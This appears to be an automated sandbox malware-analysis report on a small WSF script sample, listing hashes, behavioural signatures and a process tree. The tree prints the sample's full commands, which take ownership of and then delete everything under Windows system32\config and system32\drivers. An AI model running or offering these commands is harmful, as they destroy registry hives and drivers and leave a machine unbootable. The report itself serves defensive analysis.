Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
15-08-2024 21:32
Static task
static1
Behavioral task
behavioral1
Sample
file.wsf
Resource
win7-20240704-en
General
-
Target
file.wsf
-
Size
2KB
-
MD5
a5248e8a553244ebf5fe783d59068860
-
SHA1
f866fc5f1d41e8cf209b3ea253f49a9caebb0012
-
SHA256
e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
-
SHA512
7f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 1264 takeown.exe 2796 takeown.exe 1912 icacls.exe 2160 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exeicacls.exetakeown.exepid process 1264 takeown.exe 1912 icacls.exe 2160 icacls.exe 2796 takeown.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
Notepad.exepid process 2816 Notepad.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 1264 takeown.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 2764 wrote to memory of 2788 2764 cmd.exe WScript.exe PID 2764 wrote to memory of 2788 2764 cmd.exe WScript.exe PID 2764 wrote to memory of 2788 2764 cmd.exe WScript.exe PID 2788 wrote to memory of 2628 2788 WScript.exe cmd.exe PID 2788 wrote to memory of 2628 2788 WScript.exe cmd.exe PID 2788 wrote to memory of 2628 2788 WScript.exe cmd.exe PID 2788 wrote to memory of 2680 2788 WScript.exe cmd.exe PID 2788 wrote to memory of 2680 2788 WScript.exe cmd.exe PID 2788 wrote to memory of 2680 2788 WScript.exe cmd.exe PID 2628 wrote to memory of 2796 2628 cmd.exe takeown.exe PID 2628 wrote to memory of 2796 2628 cmd.exe takeown.exe PID 2628 wrote to memory of 2796 2628 cmd.exe takeown.exe PID 2680 wrote to memory of 1264 2680 cmd.exe takeown.exe PID 2680 wrote to memory of 1264 2680 cmd.exe takeown.exe PID 2680 wrote to memory of 1264 2680 cmd.exe takeown.exe PID 2628 wrote to memory of 1912 2628 cmd.exe icacls.exe PID 2628 wrote to memory of 1912 2628 cmd.exe icacls.exe PID 2628 wrote to memory of 1912 2628 cmd.exe icacls.exe PID 2680 wrote to memory of 2160 2680 cmd.exe icacls.exe PID 2680 wrote to memory of 2160 2680 cmd.exe icacls.exe PID 2680 wrote to memory of 2160 2680 cmd.exe icacls.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2796
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2160
-
-
-
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\UnpublishReceive.vbs1⤵
- Opens file in notepad (likely ransom note)
PID:2816
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\SetPush.vbs"1⤵PID:2976
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\UnpublishReceive.vbs"1⤵PID:2804
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T1⤵PID:2604
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5a5248e8a553244ebf5fe783d59068860
SHA1f866fc5f1d41e8cf209b3ea253f49a9caebb0012
SHA256e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
SHA5127f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8
-
Filesize
78B
MD5ece02545122cc48c9d8afaf3f94dd04f
SHA18e07b6da685faad07f8413230a95ce0ae8987e0d
SHA2565098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
SHA512e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5